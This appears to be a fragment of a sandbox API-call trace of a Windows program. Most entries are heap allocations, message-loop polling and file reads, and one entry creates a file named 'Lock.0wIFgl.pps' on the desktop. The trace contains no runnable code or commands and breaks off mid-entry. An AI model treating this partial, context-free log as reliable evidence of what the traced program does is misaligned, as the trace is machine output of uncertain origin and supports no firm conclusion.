RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0159.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0159.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0159.352] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0159.354] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/Lock.0wIFgl.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lock.0wifgl.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0159.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0159.359] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0159.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0159.359] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0159.359] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0159.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0159.359] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0159.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0159.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0159.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0159.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0159.360] SetFilePointerEx (in: hFile=0x1e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0159.360] ReadFile (in: hFile=0x1e8, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0xd6d0, lpOverlapped=0x0) returned 1 [0160.573] ReadFile (in: hFile=0x1e8, lpBuffer=0x34b2250, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x34b2250*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0160.574] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 1 [0160.574] TranslateMessage (lpMsg=0x8bf710) returned 0 [0160.574] DispatchMessageW (lpMsg=0x8bf710) returned 0x0 [0160.574] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0160.574] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0160.575] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0160.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0160.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0160.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0160.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0160.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd6d0) returned 0x24b7a48 [0160.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0160.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0160.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0160.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0160.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0160.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0160.575] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0160.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0160.575] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0160.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0160.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0160.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0160.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0160.576] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0160.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0160.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0160.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0160.576] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0160.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0160.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0160.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0160.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2ce8 [0160.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0160.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0160.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0160.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0160.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd6d0) returned 0x24b7a48 [0160.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0160.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1bc8 [0160.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0160.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0160.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0160.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1708 [0160.576] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0160.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0160.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0160.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0160.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0160.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0160.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0160.577] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa9b0 [0160.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0160.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0160.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0160.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0160.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0160.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0160.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0160.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd6d0) returned 0x24d27f8 [0160.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0160.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0160.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0160.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0160.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0160.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0160.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0160.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0160.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0160.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0160.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0160.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0160.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0160.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0160.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0160.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0160.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0160.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0160.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0160.584] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0160.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0160.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0160.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0160.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0160.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0160.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0160.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0160.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0160.585] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0160.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0160.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0160.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0160.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0160.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0160.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0160.585] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0160.585] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.585] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0160.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0160.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0160.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0160.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0160.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0160.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0160.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0160.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0160.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0160.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0160.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0160.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0160.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0160.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0160.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0160.586] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0160.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0160.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0160.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0160.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0160.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0160.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0160.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0160.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0160.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0160.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0160.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0160.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0160.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0160.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0160.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0160.587] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0160.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0160.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0160.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0160.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0160.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0160.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0160.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0160.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0160.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0160.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0160.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0160.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0160.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0160.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0160.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0160.588] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0160.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0160.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0160.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0160.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0160.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0160.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0160.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0160.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0160.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0160.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0160.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0160.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0160.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0160.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0160.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0160.589] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0160.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0160.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0160.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0160.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0160.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0160.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0160.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0160.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0160.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0160.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0160.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0160.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0160.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0160.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0160.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0160.590] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0160.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0160.590] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0160.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0160.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa830 [0160.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0160.590] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0160.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0160.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0160.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0160.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0160.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0160.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0160.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0160.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0160.591] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0160.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0160.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0160.591] HeapFree (in: 